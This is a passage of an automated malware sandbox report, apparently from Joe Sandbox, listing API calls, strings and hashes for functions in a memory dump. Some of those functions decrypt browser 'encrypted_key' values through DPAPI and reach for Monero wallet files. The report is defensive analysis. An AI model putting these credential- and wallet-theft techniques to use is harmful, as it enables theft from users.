                                • Instruction Fuzzy Hash: 5E5193B1D142189BDF64EB94DC45BEEB3B4AF04304F1040A8E21977182EF742E88DF55
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 224a45fe203f61a89acdc2fb507fbd950cbfb898170a753f43d21a1268ed850d
                                • Instruction ID: f1d2e13566463a6b4d533d864ee034b2f8e9d0363bec7ad9734b5ec384b6cc84
                                • Opcode Fuzzy Hash: 224a45fe203f61a89acdc2fb507fbd950cbfb898170a753f43d21a1268ed850d
                                • Instruction Fuzzy Hash: 0D411D71E10109AFCF04EFE4D846AFEB7B4AF55304F008518E51677291EB75AA09DFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00089D39
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089AEF
                                  • Part of subcall function 00089AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00084EEE,00000000,?), ref: 00089B01
                                  • Part of subcall function 00089AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00084EEE,00000000,00000000), ref: 00089B2A
                                  • Part of subcall function 00089AC0: LocalFree.KERNEL32(?,?,?,?,00084EEE,00000000,?), ref: 00089B3F
                                  • Part of subcall function 00089B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                  • Part of subcall function 00089B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                  • Part of subcall function 00089B60: LocalFree.KERNEL32(?), ref: 00089BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 9982e015f7c505929f2e3f789e1e2d26e5c7c30540bf2352f805cbd57f16415b
                                • Instruction ID: 7eb95e0a02949c507646bf1a47946a38d697e2c5673a7b87b10a90abb23d0042
                                • Opcode Fuzzy Hash: 9982e015f7c505929f2e3f789e1e2d26e5c7c30540bf2352f805cbd57f16415b
                                • Instruction Fuzzy Hash: 3A3110B5D10209ABCF04FBE4DD85AFEB7B9BF48304F184519E945A7242E7309A14CBA5
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000A05B7), ref: 000986CA
                                • Process32First.KERNEL32(?,00000128), ref: 000986DE
                                • Process32Next.KERNEL32(?,00000128), ref: 000986F3
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • CloseHandle.KERNEL32(?), ref: 00098761
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                • Instruction ID: 28a770abcd17d0799646d805156b67f20958869bb8dab24ed61be8cbd8d3e747
                                • Opcode Fuzzy Hash: bc06f9be847d55c790ce4df1b634888fa0f3346d814bf9dbb93693304aabfccd
                                • Instruction Fuzzy Hash: B7314D71A11218ABCF24DF95DC45FEEB778FB46700F104199F10AA61A1DF306A45DFA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E00,00000000,?), ref: 000979B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000979B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,000A0E00,00000000,?), ref: 000979C4
                                • wsprintfA.USER32 ref: 000979F3
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                • Instruction ID: 8e2cbf19dd493d2b1d3ba30ac518c0e96a9be8877080c3187ba6e4876b897745
                                • Opcode Fuzzy Hash: 3db8a3349c6aa84a1d59d11132d9ca7b9edc0e2c82c62a49132cf3dd0ad54647
                                • Instruction Fuzzy Hash: 5C1115B2904118ABCB149FC9ED49FBEB7F8EB48B15F10421AF605A2280E2395940DBB1
                                APIs
                                • __getptd.LIBCMT ref: 0009C74E
                                  • Part of subcall function 0009BF9F: __amsg_exit.LIBCMT ref: 0009BFAF
                                • __getptd.LIBCMT ref: 0009C765
                                • __amsg_exit.LIBCMT ref: 0009C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0009C797
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                • Instruction ID: 20987f5c33e9b1e45bdf8ca57ce5139b357ad4d64892f984acd7f8c05e315e59
                                • Opcode Fuzzy Hash: eb81484084110f7b2f6be819198dc62ad258f09fa79ae0786887f068fd011611
                                • Instruction Fuzzy Hash: 35F09032E08A009BFF60BBF86946B9D73E06F01720F204159F404A61D3DB645940BE96
                                APIs
                                  • Part of subcall function 00098DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00098E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00094F7A
                                • lstrcat.KERNEL32(?,000A1070), ref: 00094F97
                                • lstrcat.KERNEL32(?,00D08920), ref: 00094FAB
                                • lstrcat.KERNEL32(?,000A1074), ref: 00094FBD
                                  • Part of subcall function 00094910: wsprintfA.USER32 ref: 0009492C
                                  • Part of subcall function 00094910: FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                  • Part of subcall function 00094910: StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                  • Part of subcall function 00094910: FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                  • Part of subcall function 00094910: FindClose.KERNEL32(000000FF), ref: 00094B92
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                • Instruction ID: fd3f79142ff3f8f7f962b8dce798fb5b6a4abaf9f7d6354cbb23d188d7af0a41
                                • Opcode Fuzzy Hash: f2f787d6057ca9b9c4330dd4638f931d757373cccbfa7bbdc7147fb29a515c43
                                • Instruction Fuzzy Hash: F821AD7690020CA7CB54F7B0FC4AEED333CAB55304F404558B65997182EE7596C9CB93